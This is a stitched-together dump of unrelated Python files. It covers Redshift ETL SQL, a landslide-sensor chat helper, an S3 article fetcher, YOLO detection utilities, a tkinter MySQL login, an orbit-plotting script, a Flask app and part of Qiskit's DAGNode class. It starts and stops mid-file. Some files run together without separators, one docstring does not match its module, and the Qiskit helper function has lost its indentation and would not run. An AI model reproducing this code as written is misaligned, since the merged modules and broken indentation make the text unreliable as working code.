config.get('IAM_ROLE', 'ARN'),
config.get('S3','LOG_JSONPATH'))
staging_songs_copy = ("""copy staging_songs from {}
iam_role {}
region 'us-west-2'
JSON 'auto'
""").format(config.get('S3','SONG_DATA'),
config.get('IAM_ROLE', 'ARN'))
# FINAL TABLES
songplay_table_insert = ("""INSERT INTO songplays (start_time, user_id, level, song_id, artist_id, session_id, location, user_agent)
SELECT DISTINCT
TIMESTAMP 'epoch' + se.ts/1000 *INTERVAL '1 second' as start_time,
se.user_id,
se.level,
ss.song_id,
ss.artist_id,
se.session_id,
se.location,
se.user_agent
FROM staging_events se, staging_songs ss
WHERE se.page = 'NextSong'
AND se.song_title = ss.title
AND user_id NOT IN (SELECT DISTINCT s.user_id FROM songplays s WHERE s.user_id = user_id
AND s.start_time = start_time AND s.session_id = session_id )
""")
user_table_insert = ("""INSERT INTO users (user_id, first_name, last_name, gender, level)
SELECT DISTINCT
user_id,
first_name,
last_name,
gender,
level
FROM staging_events
WHERE page = 'NextSong'
AND user_id NOT IN (SELECT DISTINCT user_id FROM users)
""")
song_table_insert = ("""INSERT INTO songs (song_id, title, artist_id, year, duration)
SELECT DISTINCT
song_id,
title,
artist_id,
year,
duration
FROM staging_songs
WHERE song_id NOT IN (SELECT DISTINCT song_id FROM songs)
""")
artist_table_insert = ("""INSERT INTO artists (artist_id, name, location, latitude, longitude)
SELECT DISTINCT
artist_id,
name,
location,
latitude,
longitude
FROM staging_songs
WHERE artist_id NOT IN (SELECT DISTINCT artist_id FROM artists)
""")
time_table_insert = ("""INSERT INTO time (start_time, hour, day, week, month, year, weekday)
SELECT
start_time,
EXTRACT(hr from start_time) AS hour,
EXTRACT(d from start_time) AS day,
EXTRACT(w from start_time) AS week,
EXTRACT(mon from start_time) AS month,
EXTRACT(yr from start_time) AS year,
EXTRACT(weekday from start_time) AS weekday
FROM (
SELECT DISTINCT TIMESTAMP 'epoch' + se.ts/1000 *INTERVAL '1 second' as start_time
FROM staging_events se
)
WHERE start_time NOT IN (SELECT DISTINCT start_time FROM time)
""")
# QUERY LISTS
# songplays is created last because its DDL references users, songs,
# artists and time; the drop list runs staging/fact tables first so no
# referenced table is dropped while still needed.
create_table_queries = [staging_events_table_create, staging_songs_table_create, user_table_create, song_table_create, artist_table_create, time_table_create, songplay_table_create]
drop_table_queries = [staging_events_table_drop, staging_songs_table_drop, songplay_table_drop, user_table_drop, song_table_drop, artist_table_drop, time_table_drop]
copy_table_queries = [staging_events_copy, staging_songs_copy]
insert_table_queries = [songplay_table_insert, user_table_insert, song_table_insert, artist_table_insert, time_table_insert]
|
"""Example of using hangups to receive chat messages.
Uses the high-level hangups API.
"""
import re
from datetime import datetime as dt
from datetime import timedelta as td
import volatile.memory as mem
import dynadb.db as db
def check_site_sensor(site_code):
    """ Returns names of sensors (rain, tilt, soms, piezo) in site.

    Looks up the site's active loggers and appends one report line per
    installed sensor via check_sensor_data(); on any failure the whole
    report is replaced by an error marker for the site code.
    """
    df_sites = mem.get("df_sites")
    message = ""
    try:
        site_id = df_sites.site_id[df_sites.site_code == site_code.lower()].values[0]
        query_loggers = ("SELECT * FROM (Select logger_name, model_id from commons_db.loggers "
            "where site_id = {} and date_deactivated is NULL and logger_id not in (141)) as l "
            "inner join commons_db.logger_models "
            "on logger_models.model_id = l.model_id".format(site_id))
        site_loggers = db.df_read(query_loggers,connection="common")
        for i in site_loggers.index:
            is_gateway = site_loggers.logger_type[i] == "gateway"
            # One (flag, table-prefix) pair per sensor type; tilt/soms/piezo
            # live on the logger itself, so gateways are skipped for those,
            # while rain is reported for every logger.
            for sensor, gateway_ok in (("rain", True), ("tilt", False),
                                       ("soms", False), ("piezo", False)):
                has_sensor = site_loggers["has_{}".format(sensor)][i] == 1
                if has_sensor and (gateway_ok or not is_gateway):
                    table_name = "{}_{}".format(sensor, site_loggers.logger_name[i])
                    message += check_sensor_data(table_name)
        message = message[:-1]  # drop the trailing newline
    except Exception:
        # BUG fix: was a bare `except:`, which also swallowed SystemExit
        # and KeyboardInterrupt.
        message = "error site_code: {}".format(site_code)
    return message
def check_sensor_data(table_name = '', data = False):
    """ Returns data presence of sensor (format: rain_xxxxx, tilt_xxxxx).

    Reports whether *table_name* has data within the last 30 minutes; when
    *data* is True the latest values are appended to the report.
    """
    list_mes = ""
    try:
        if re.search("rain",table_name) or re.search("piezo",table_name):
            # Single-row sensors: just take the most recent record.
            query_table = ("SELECT * FROM {} "
                "where ts <= NOW() order by ts desc limit 1 ".format(table_name))
        else:
            # Node-based sensors: fetch all rows within 30 min of the
            # latest timestamp so every node is represented.
            query_table = ("SELECT ts, node_id, type_num FROM {} "
                "where ts > (SELECT ts FROM {} where ts <= NOW() order by ts desc limit 1) "
                "- interval 30 minute and ts<=NOW() ".format(table_name,table_name))
        last_data = db.df_read(query_table, connection= "analysis")
        latest_ts = last_data.ts.max()
        # "MERON ngayon" = has data now, "WALA ngayon" = none (Filipino).
        if dt.now()-latest_ts <= td(minutes = 30):
            list_mes += "{}: MERON ngayon\n".format(table_name)
        else:
            list_mes += "{}: WALA ngayon\n".format(table_name)
        if data:
            list_mes += "latest ts: {}\n".format(latest_ts)
            if re.search("rain",table_name):
                list_mes += "rain = {}mm\n".format(last_data.rain[0])
                list_mes += "batt1 = {}\n".format(last_data.battery1[0])
                list_mes += "batt2 = {}\n".format(last_data.battery2[0])
            elif re.search("piezo",table_name):
                print ("piezo")
            else:
                # v2+ loggers have longer table names; count nodes per
                # message type for those.
                if len(table_name)>9:
                    num_nodes = last_data.groupby('type_num').size().rename('num').reset_index()
                    for msgid,n_nodes in zip(num_nodes.type_num,num_nodes.num):
                        list_mes += "msgid = {} ; # of nodes = {}\n".format(msgid,n_nodes)
                # v1 loggers: plain node count.
                else:
                    n_nodes = last_data.node_id.count()
                    list_mes += "# of nodes = {}".format(n_nodes)
    except Exception:
        # BUG fix: was a bare `except:`, which also swallowed SystemExit
        # and KeyboardInterrupt.
        list_mes = "error table: {}\n".format(table_name)
        if data:
            list_mes += "format: tilt_xxxxx, rain_xxxxx, etc"
    return list_mes
def check_logger_number(received_msg):
    """ Returns which logger uses the given number."""
    message = ""
    # every run of digits in the message is treated as a candidate sim number
    for num in map(int, re.findall(r"\d+", received_msg)):
        query_num = ("SELECT logger_name FROM logger_mobile "
                     "inner join commons_db.loggers "
                     "on logger_mobile.logger_id = loggers.logger_id "
                     "where loggers.date_deactivated is null "
                     "and logger_mobile.date_deactivated is null "
                     "and sim_num like '%%{}'".format(num))
        try:
            logger_name = db.read(query_num, resource="sms_data")[0][0]
        except IndexError:
            # empty result set: the number belongs to no active logger
            message += "{} : not a logger\n".format(num)
        else:
            message += "{} : {}\n".format(num, logger_name)
    return message
def get_server_number():
    """ Returns list of server numbers (MIA, gsm, CT phone)."""
    gsm_df = mem.get('df_gsm_modules')

    def sim_of(gsm_name):
        # single sim number for the gsm module with this exact name
        return gsm_df.loc[gsm_df.gsm_name == gsm_name, 'gsm_sim_num'].values[0]

    message = "Server number for MIA:\nGlobe: {}\nSmart: {}\n".format(sim_of('globe'), sim_of('smart'))
    globe_logger_sims = gsm_df.loc[gsm_df.gsm_name.isin(['globe1', 'globe2']), 'gsm_sim_num'].values
    smart_logger_sims = gsm_df.loc[gsm_df.gsm_name.isin(['smart1', 'smart2']), 'gsm_sim_num'].values
    message += "\nServer number for LOGGERS:\nGlobe:\n{}\nSmart:\n{}\n".format(
        '\n'.join(globe_logger_sims), '\n'.join(smart_logger_sims))
    # gsm ids per carrier, used to split the CT phone rows below
    globe_ids = gsm_df.loc[gsm_df.gsm_name.str.contains('globe'), 'gsm_id']
    smart_ids = gsm_df.loc[gsm_df.gsm_name.str.contains('smart'), 'gsm_id']
    query = ("SELECT sim_num, gsm_id FROM mobile_numbers "
             "INNER JOIN user_mobiles "
             "USING (mobile_id) "
             "INNER JOIN commons_db.users "
             "USING (user_id) "
             "WHERE nickname = 'CT Phone'")
    ct_phone = db.df_read(query, resource="sms_data")
    message += "\nCT Phone:\nGlobe: {}\nSmart: {}".format(
        ct_phone.loc[ct_phone.gsm_id.isin(globe_ids), 'sim_num'].values[0],
        ct_phone.loc[ct_phone.gsm_id.isin(smart_ids), 'sim_num'].values[0])
    return message
def get_number(received_msg):
    """ Returns which logger or user the given number is registered to."""
    # Active logger names and user nicknames form the search vocabulary.
    query_loggers = "select logger_name from loggers where date_deactivated is NULL"
    loggers = db.df_read(query_loggers, resource= "common_data").logger_name.to_numpy()
    query_users = ("SELECT nickname FROM users where nickname is not NULL "
        "and nickname !='' and status = 1 ")
    users = db.df_read(query_users, resource= "common_data").nickname.str.lower().to_numpy()
    message = ""
    # Lookahead alternation finds every name preceded by a space, allowing
    # overlapping matches. NOTE(review): names are interpolated unescaped into
    # the pattern -- a name containing regex metacharacters would break it.
    check_logger = re.findall(r" (?=("+'|'.join(loggers)+r"))", received_msg.lower())
    check_user = re.findall(r" (?=("+'|'.join(users)+r"))", received_msg.lower())
    if check_logger:
        for logger_name in check_logger:
            query_num = ("SELECT sim_num FROM logger_mobile "
                "inner join commons_db.loggers "
                "on logger_mobile.logger_id = loggers.logger_id "
                "where logger_name = '{}'".format(logger_name))
            logger_num = db.read(query_num, resource= "sms_data")[0][0]
            message += "{} : {}\n".format(logger_name, logger_num)
    if check_user:
        # NOTE(review): the inner loop below shadows this 'nickname' variable;
        # it works because the outer value is only used to build the query,
        # but rename with care.
        for nickname in check_user:
            query_num = ("SELECT nickname, sim_num FROM commons_db.users "
                "LEFT JOIN user_mobiles USING (user_id) "
                "LEFT JOIN mobile_numbers USING (mobile_id) "
                "WHERE nickname IS NOT NULL AND nickname !='' "
                "AND users.status = 1 "
                "AND nickname LIKE '%%{}%%'".format(nickname))
            user_num = db.df_read(query_num, resource= "sms_data")
            user_num = user_num.fillna('')  # missing sim_num -> empty string
            # one output line per distinct matched nickname
            for nickname in set(user_num.nickname):
                curr_num = ', '.join(user_num.loc[user_num.nickname == nickname, 'sim_num'].values)
                if len(curr_num) != 0:
                    message += "{} : {}\n".format(nickname, curr_num)
                else:
                    message += "{} : no number\n".format(nickname)
    if not check_user and not check_logger:
        message += "error: not a logger nor a user\n"
    return message
def check_node(received_msg):
    """ Returns n_id of the given tsm sensor."""
    query_loggers = "select tsm_name from tsm_sensors where date_deactivated is NULL"
    sensors = db.df_read(query_loggers, resource="sensor_data").tsm_name.to_numpy()
    # match any active tsm_name preceded by a space, allowing overlaps
    matched_sensors = re.findall(r" (?=(" + '|'.join(sensors) + r"))", received_msg.lower())
    message = ""
    for tsm_name in matched_sensors:
        try:
            query_node = ("SELECT n_id FROM deployed_node "
                          "inner join tsm_sensors "
                          "on tsm_sensors.tsm_id = deployed_node.tsm_id "
                          "where tsm_name = '{}' order by node_id".format(tsm_name))
            node_ids = db.df_read(query_node, resource="sensor_data").n_id
            message += "{} : ".format(tsm_name)
            for nid in node_ids:
                message += "{},".format(nid)
            # drop the trailing comma (or the trailing space when no nodes)
            message = message[:-1] + "\n"
        except:
            message += "no data for {}\n".format(tsm_name)
    return message
from io import BytesIO
from urllib.parse import urlparse
import logging
import requests
from lxml import etree
from readability import Document
from kermes_infra.messages import AddArticleMessage, ArticleFetchCompleteMessage
from kermes_infra.models import Article, RelatedContent
from kermes_infra.queues import SQSProducer
from kermes_infra.repositories import ArticleRepository, FileRepository, UserRepository
class Fetcher:
    """Fetch an article's HTML and its images, store them, and signal completion.

    Pipeline: parse an AddArticleMessage, download the page, simplify it with
    readability, mirror its images into the file store, persist the Article,
    then publish an ArticleFetchCompleteMessage.
    """

    def __init__(
        self,
        user_repository: UserRepository,
        article_repository: ArticleRepository,
        file_repository: FileRepository,
        finished_queue_producer: SQSProducer,
        logger: logging.Logger,
    ) -> None:
        self.user_repository = user_repository
        self.article_repository = article_repository
        self.file_repository = file_repository
        self.finished_queue_producer = finished_queue_producer
        self.logger = logger

    @classmethod
    def get_filename_from_url(cls, url: str) -> str:
        """Return the final path segment of *url* (empty if the path ends in '/')."""
        parsed_url = urlparse(url)
        return parsed_url.path.rpartition("/")[-1]

    def process_message(self, message_json: str) -> bool:
        """Process one AddArticleMessage; return True on success.

        Failure to fetch an individual image is logged and skipped; failure to
        fetch the article or store content/metadata aborts with False so the
        SQS message can be retried.
        """
        self.logger.debug(f"processing message {message_json}")

        # parse the JSON SQS message
        add_article_msg = AddArticleMessage.from_json(message_json)

        try:
            # fetch the content from the URL in the message
            resp = requests.get(add_article_msg.url)
        except Exception:
            self.logger.exception(f"failed to fetch article at url {add_article_msg.url}")
            return False

        self.logger.debug("simplifying content")
        readable_content = Document(resp.text)
        parser = etree.HTMLParser()
        content_dom = etree.fromstring(readable_content.summary(), parser)

        # create an Article model
        article = Article(add_article_msg.user_id)
        article.url = resp.url

        # extract the title from the content
        self.logger.debug("extracting article title")
        article.title = readable_content.title()

        # extract the images from the content
        self.logger.debug("fetching related content")
        for image in content_dom.iter("img"):
            img_url = image.get("src")
            try:
                # fetch the image by the URL
                self.logger.debug(f"fetching related image at {img_url}")
                img_resp = requests.get(img_url)
                img_key = f"{article.user_id}/articles/{article.article_id}/related/{Fetcher.get_filename_from_url(img_resp.url)}"
            except Exception:
                self.logger.exception(f"failed to fetch related image at url {img_url}")
                continue

            # save the image to S3
            # BUG FIX: previously used resp.content (the article HTML), which
            # stored the page bytes under every image key
            self.logger.debug(f"writing image {img_url} to S3 with key {img_key}")
            if not self.file_repository.put(img_key, BytesIO(img_resp.content)):
                continue

            # create RelatedContent models for each image and add to the Article
            # BUG FIX: the content type must come from the image response, not the page
            article.related_content.append(RelatedContent(img_resp.headers["Content-Type"], img_key))

            # re-write the content HTML to point to the new image URL
            self.logger.debug(f"re-writing img element with new URL {img_key}")
            image.set("src", img_key)

        # write the content to S3
        content_key = f"{article.user_id}/articles/{article.article_id}/content.html"
        self.logger.debug(f"writing content to S3 with key {content_key}")
        if not self.file_repository.put(
            content_key, BytesIO(etree.tostring(content_dom.getroottree(), pretty_print=True, method="html"))
        ):
            return False

        # update the Article with the content key
        article.content_key = content_key

        # write the Article to Dynamo
        self.logger.debug(
            f"writing article to debug with keys user_id {article.user_id} article_id {article.article_id}"
        )
        if not self.article_repository.put(article):
            return False

        # send a completed message to SQS
        self.logger.debug("writing completed message to SQS")
        if not self.finished_queue_producer.send_message(
            ArticleFetchCompleteMessage(article.user_id, article.article_id).to_json()
        ):
            return False

        return True
|
import math
import numpy as np
import cv2
import random
import colorsys
# The 80 COCO object-detection class labels, in model output index order.
coco = ['person', 'bicycle', 'car', 'motorcycle', 'airplane', 'bus', 'train', 'truck', 'boat', 'traffic light',
        'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird', 'cat', 'dog', 'horse', 'sheep', 'cow',
        'elephant', 'bear', 'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie', 'suitcase', 'frisbee',
        'skis', 'snowboard', 'sports ball', 'kite', 'baseball bat', 'baseball glove', 'skateboard', 'surfboard',
        'tennis racket', 'bottle', 'wine glass', 'cup', 'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
        'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza', 'donut', 'cake', 'chair', 'couch',
        'potted plant', 'bed', 'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote', 'keyboard', 'cell phone',
        'microwave', 'oven', 'toaster', 'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors', 'teddy bear',
        'hair drier', 'toothbrush']
def gen_colors(classes):
    """
    generate unique hues for each class and convert to bgr

    classes -- list -- class names (80 for coco dataset)
    -> list of (b, g, r) int tuples, one per class
    """
    n = len(classes)
    # evenly spaced hues, fixed saturation/value
    hsvs = [[i / n, 1., 0.7] for i in range(n)]
    # fixed seed so colors are reproducible across runs
    random.seed(1234)
    random.shuffle(hsvs)
    # hsv -> rgb -> scaled bgr tuple
    return [tuple(int(channel * 255) for channel in colorsys.hsv_to_rgb(h, s, v)[::-1])
            for h, s, v in hsvs]
# Pre-computed BGR color per COCO class index; used by draw_results.
color_list = gen_colors(coco)
def sigmoid(x):
    """Scalar logistic function: maps any real x into (0, 1)."""
    exp_neg = math.exp(-x)
    return 1 / (1 + exp_neg)
def sigmoid_v(array):
    """Vectorised logistic function for numpy arrays."""
    return 1.0 / (np.exp(-array) + 1.0)
def make_grid(nx, ny):
    """
    Create scaling tensor based on box location
    Source: https://github.com/ultralytics/yolov5/blob/master/models/yolo.py
    Arguments
        nx: x-axis num boxes
        ny: y-axis num boxes
    Returns
        grid: tensor of shape (1, 1, ny, nx, 2)  -- note: the reshape below
        fixes this shape; an earlier docstring claimed (1, 1, nx, ny, 80).
    """
    nx_vec = np.arange(nx)
    ny_vec = np.arange(ny)
    # NOTE(review): np.meshgrid defaults to 'xy' indexing, so yv/xv come out
    # with shape (nx, ny) before the reshape; upstream yolov5 stacks (xv, yv)
    # instead of (yv, xv) -- confirm the intended cell ordering for non-square
    # grids before reusing this elsewhere.
    yv, xv = np.meshgrid(ny_vec, nx_vec)
    grid = np.stack((yv, xv), axis=2)
    # broadcastable per-cell offset grid
    grid = grid.reshape(1, 1, ny, nx, 2)
    return grid
def xywh2xyxy(x, origin_w=0, origin_h=0, INPUT_W=640, INPUT_H=640):
    """
    description: Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right,
                 undoing the letterbox padding/scaling applied for inference.
    param:
        origin_h:   height of original image
        origin_w:   width of original image
        x:          A boxes tensor, each row is a box [center_x, center_y, w, h]
    return:
        y:          A boxes tensor, each row is a box [x1, y1, x2, y2]
    """
    y = np.zeros_like(x)
    r_w = INPUT_W / origin_w
    r_h = INPUT_H / origin_h
    half_w = x[:, 2] / 2
    half_h = x[:, 3] / 2
    if r_h > r_w:
        # width-limited: padding was added on the y axis
        pad = (INPUT_H - r_w * origin_h) / 2
        y[:, 0] = x[:, 0] - half_w
        y[:, 2] = x[:, 0] + half_w
        y[:, 1] = x[:, 1] - half_h - pad
        y[:, 3] = x[:, 1] + half_h - pad
        y /= r_w
    else:
        # height-limited: padding was added on the x axis
        pad = (INPUT_W - r_h * origin_w) / 2
        y[:, 0] = x[:, 0] - half_w - pad
        y[:, 2] = x[:, 0] + half_w - pad
        y[:, 1] = x[:, 1] - half_h
        y[:, 3] = x[:, 1] + half_h
        y /= r_h
    return y
def non_max_suppression(boxes, confs, classes, iou_thres=0.6):
    """Greedy IoU-based NMS: keep the highest-confidence box of each overlap group."""
    x1, y1, x2, y2 = boxes[:, 0], boxes[:, 1], boxes[:, 2], boxes[:, 3]
    areas = (x2 - x1 + 1) * (y2 - y1 + 1)
    # candidate indices, highest confidence first
    remaining = confs.flatten().argsort()[::-1]
    keep = []
    while remaining.size > 0:
        best = remaining[0]
        keep.append(best)
        rest = remaining[1:]
        # intersection of the best box with every remaining box
        ix1 = np.maximum(x1[best], x1[rest])
        iy1 = np.maximum(y1[best], y1[rest])
        ix2 = np.minimum(x2[best], x2[rest])
        iy2 = np.minimum(y2[best], y2[rest])
        inter = np.maximum(0.0, ix2 - ix1 + 1) * np.maximum(0.0, iy2 - iy1 + 1)
        iou = inter / (areas[best] + areas[rest] - inter)
        # drop every box that overlaps the kept one above the threshold
        remaining = rest[np.where(iou <= iou_thres)[0]]
    boxes = boxes[keep]
    confs = confs[keep]
    classes = classes[keep]
    return boxes, confs, classes
def nms(pred, iou_thres=0.6, origin_w=0, origin_h=0):
    """Convert raw predictions to corner boxes, pick the best class per box, and run NMS."""
    class_scores = pred[:, 5:]
    corner_boxes = xywh2xyxy(pred[..., 0:4], origin_w, origin_h)
    # best class only
    best_confs = np.amax(class_scores, 1, keepdims=True)
    best_classes = np.argmax(class_scores, axis=-1)
    return non_max_suppression(corner_boxes, best_confs, best_classes, iou_thres)
def letterbox(img, new_shape=(640, 640), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):
    """Resize *img* to fit *new_shape*, padding the borders with *color*.

    auto=True pads only to the nearest 32-pixel multiple (minimum rectangle);
    scaleFill=True stretches with no padding; scaleup=False never enlarges.
    Returns only the resized-and-padded image (ratio/padding are computed but
    not returned, unlike the upstream yolov5 version).
    """
    # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232
    shape = img.shape[:2]  # current shape [height, width]
    if isinstance(new_shape, int):
        new_shape = (new_shape, new_shape)

    # Scale ratio (new / old)
    r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])
    if not scaleup:  # only scale down, do not scale up (for better test mAP)
        r = min(r, 1.0)

    # Compute padding
    ratio = r, r  # width, height ratios (NOTE: computed but unused here)
    new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))
    dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1]  # wh padding
    if auto:  # minimum rectangle
        dw, dh = np.mod(dw, 32), np.mod(dh, 32)  # wh padding
    elif scaleFill:  # stretch
        dw, dh = 0.0, 0.0
        new_unpad = (new_shape[1], new_shape[0])
        ratio = new_shape[1] / shape[1], new_shape[0] / shape[0]  # width, height ratios

    dw /= 2  # divide padding into 2 sides
    dh /= 2

    if shape[::-1] != new_unpad:  # resize
        img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)
    # the -0.1/+0.1 rounding splits an odd padding pixel between the two sides
    top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))
    left, right = int(round(dw - 0.1)), int(round(dw + 0.1))
    img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color)  # add border
    return img
def GiB(val):
    """Convert a gibibyte count to bytes (val * 2**30)."""
    return val << 30
def draw_results(img, boxes, confs, classes):
    """Render detections on a copy of *img* and display them; blocks until a key is pressed."""
    window_name = 'final results'
    cv2.namedWindow(window_name)
    overlay = img.copy()
    final = img.copy()
    for box, conf, cls in zip(boxes, confs, classes):
        x1, y1, x2, y2 = box
        score = conf[0]
        label_color = color_list[cls]
        # bounding box
        cv2.rectangle(overlay, (x1, y1), (x2, y2), label_color, thickness=1, lineType=cv2.LINE_AA)
        # class label and confidence, just above the box
        cv2.putText(overlay, '%s %f' % (coco[cls], score), org=(x1, int(y1-10)),
                    fontFace=cv2.FONT_HERSHEY_SIMPLEX, fontScale=0.5, color=label_color)
    # cv2.addWeighted(overlay, 0.5, final, 1 - 0.5, 0, final)
    cv2.imshow(window_name, overlay)
    cv2.waitKey(0)
import mysql.connector
import tkinter as tk
from mysql.connector import Error
from tkinter import *
from _curses import COLOR_BLACK
class loginFrame(tk.Frame):
    """Tkinter frame that prompts for the MySQL root password and opens a
    connection to the 'breathofthemild' database."""
    global connection
    # global password
    # frame.bg = COLOR_BLACK

    def __init__(self, parent, controller):
        """Build the password prompt inside *parent*.

        *controller* must provide set_connection() and show_frame(); both are
        called from create_connection on success.
        """
        tk.Frame.__init__(self, parent)
        self.controller = controller
        # super(loginFrame, self).__init__()
        self.password = Entry(self)  # masked password entry (show='*' below)
        # frame = tk.Frame(root, bg="black")
        self.place(relwidth=0.8, relheight=0.8, relx=0.1, rely=0.1)
        self.password.grid(row=0, column=1, pady=10)
        self.password.config(show='*')
        password_label = Label(self, text="Enter MySQL Password: ")
        password_label.grid(row=0, column=0)
        password_button = Button(self, text="Submit Password", command=self.create_connection)
        password_button.grid(row=2, column=0, columnspan=2)

    # def printer(self):
    #     print("{} {}".format(self.i, self.j))

    def create_connection(self):
        """Connect to local MySQL with the entered password; on success hand
        the connection to the controller and switch to the selection frame.

        Errors are printed rather than raised so the prompt stays usable.
        """
        global connection
        connection = None
        try:
            connection = mysql.connector.connect(
                host="localhost",
                user="root",
                passwd=self.password.get(),
                database="breathofthemild"
            )
            output_msg = "Connection to MySQL DB successful"  # NOTE(review): assigned but never displayed
            print(connection)
            self.controller.set_connection(connection)
            self.controller.show_frame("DatabaseSelectionFrame")
        except Error as e:
            print(f"The error '{e}' occurred")

    # menu_options = ["Insert", "Update", "Delete", "Display"]
    # selected = StringVar(frame)
    # selected.set(menu_options[0])
    # menu = OptionMenu(frame, selected, *menu_options, command=done)
    # menu.grid(row=0, column=0, pady=10)

    def execute_read_query(connection, query):
        """Run a SELECT and return all rows, or None on error.

        NOTE(review): defined without 'self' -- called on an instance, the
        instance binds as 'connection'. Probably meant to be a @staticmethod;
        confirm call sites before changing.
        """
        cursor = connection.cursor()
        result = None
        try:
            cursor.execute(query)
            result = cursor.fetchall()
            return result
        except Error as e:
            print(f"The error '{e}' occurred")

    def get_frame(self):
        """Return self.frame.

        NOTE(review): no 'frame' attribute is ever assigned in this class, so
        calling this raises AttributeError -- likely dead or broken code.
        """
        return self.frame
def done(selected):
    """Option-menu callback; *selected* is ignored."""
    print("Yay!")
# x = loginFrame()
# x.printer() |
'''This file is a test file of a 3-body simulation. It takes input from a binary data file and plots the positions of two satellites around the Earth.
'''
import matplotlib.pyplot as plt
import numpy as np
import Simulation
#Load in the data file
Data = np.load("ThreeBodyTest.npy", allow_pickle=True)
# Each element of Data appears to be a per-timestep record whose entries
# 1..3 expose a .position 3-vector (Earth, satellite 1, satellite 2);
# entry 0 is unused here -- TODO confirm against Simulation's save format.
earth_x = [items[1].position[0] for items in Data]
earth_y = [items[1].position[1] for items in Data]
earth_z = [items[1].position[2] for items in Data]
satellite_1_x = [items[2].position[0] for items in Data]
satellite_1_y = [items[2].position[1] for items in Data]
satellite_1_z = [items[2].position[2] for items in Data]
satellite_2_x = [items[3].position[0] for items in Data]
satellite_2_y = [items[3].position[1] for items in Data]
satellite_2_z = [items[3].position[2] for items in Data]

#Plot the orbits
# Only the x-y plane is plotted; the z components collected above are unused.
plt.plot(satellite_1_x, satellite_1_y, label="Satellite 1")
plt.plot(satellite_2_x, satellite_2_y, label="Satellite 2")
plt.plot(earth_x, earth_y, marker='.', label="Earth")
plt.legend()
plt.savefig('plots/Solar_System_1.pdf')
plt.show()
|
import os
from flask import Flask
import blinker as _
from ddtrace import tracer
from ddtrace.contrib.flask import TraceMiddleware
import logging
import sys
# Have flask use stdout as the logger
# Have flask use stdout as the logger
main_logger = logging.getLogger()
main_logger.setLevel(logging.DEBUG)
c = logging.StreamHandler(sys.stdout)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
c.setFormatter(formatter)
main_logger.addHandler(c)

# Point the Datadog tracer at the agent via the Kubernetes service env vars
# (raises KeyError at import time if they are unset).
tracer.configure(
    hostname=os.environ['DD_AGENT_SERVICE_HOST'],
    port=os.environ['DD_AGENT_SERVICE_PORT'],
)

app = Flask(__name__)
# Trace every request under service "my-flask-app" (no distributed tracing)
traced_app = TraceMiddleware(app, tracer, service="my-flask-app", distributed_tracing=False)


@app.route('/')
def hello_world():
    """Root endpoint; returns a fixed greeting (health-check style)."""
    return 'Flask Dockerized'


if __name__ == '__main__':
    # debug=True is for local development only -- do not ship to production
    app.run(debug=True, host='0.0.0.0')
|
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2019, 2021.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Objects to represent the information at a node in the DAGCircuit."""
import warnings
from typing import Iterable
from qiskit.circuit import Qubit, Clbit
def _condition_as_indices(operation, bit_indices):
cond = getattr(operation, "condition", None)
if cond is None:
return None
bits, value = cond
indices = [bit_indices[bits]] if isinstance(bits, Clbit) else [bit_indices[x] for x in bits]
return indices, value
class DAGNode:
    """Parent class for DAGOpNode, DAGInNode, and DAGOutNode."""

    __slots__ = ["_node_id"]

    def __init__(self, nid=-1):
        """Create a node"""
        self._node_id = nid

    def __lt__(self, other):
        # Nodes order by their insertion id only; used for stable node sorts.
        return self._node_id < other._node_id

    def __gt__(self, other):
        return self._node_id > other._node_id

    def __str__(self):
        # TODO is this used anywhere other than in DAG drawing?
        # needs to be unique as it is what pydot uses to distinguish nodes
        return str(id(self))

    @staticmethod
    def semantic_eq(node1, node2, bit_indices1=None, bit_indices2=None):
        """
        Check if DAG nodes are considered equivalent, e.g., as a node_match for nx.is_isomorphic.

        Args:
            node1 (DAGOpNode, DAGInNode, DAGOutNode): A node to compare.
            node2 (DAGOpNode, DAGInNode, DAGOutNode): The other node to compare.
            bit_indices1 (dict): Dictionary mapping Bit instances to their index
                within the circuit containing node1
            bit_indices2 (dict): Dictionary mapping Bit instances to their index
                within the circuit containing node2

        Return:
            Bool: If node1 == node2
        """
        if bit_indices1 is None or bit_indices2 is None:
            # Legacy callers get identity mappings plus a deprecation warning.
            warnings.warn(
                "DAGNode.semantic_eq now expects two bit-to-circuit index "
                "mappings as arguments. To ease the transition, these will be "
                "pre-populated based on the values found in Bit.index and "
                "Bit.register. However, this behavior is deprecated and a future "
                "release will require the mappings to be provided as arguments.",
                DeprecationWarning,
            )
            bit_indices1 = {arg: arg for arg in node1.qargs + node1.cargs}
            bit_indices2 = {arg: arg for arg in node2.qargs + node2.cargs}

        if isinstance(node1, DAGOpNode) and isinstance(node2, DAGOpNode):
            # Compare op nodes by index-mapped bit arguments, condition, and op.
            node1_qargs = [bit_indices1[qarg] for qarg in node1.qargs]
            node1_cargs = [bit_indices1[carg] for carg in node1.cargs]

            node2_qargs = [bit_indices2[qarg] for qarg in node2.qargs]
            node2_cargs = [bit_indices2[carg] for carg in node2.cargs]

            # For barriers, qarg order is not significant so compare as sets
            if node1.op.name == node2.op.name and node1.name in {"barrier", "swap"}:
                return set(node1_qargs) == set(node2_qargs)

            return (
                node1_qargs == node2_qargs
                and node1_cargs == node2_cargs
                and (
                    _condition_as_indices(node1.op, bit_indices1)
                    == _condition_as_indices(node2.op, bit_indices2)
                )
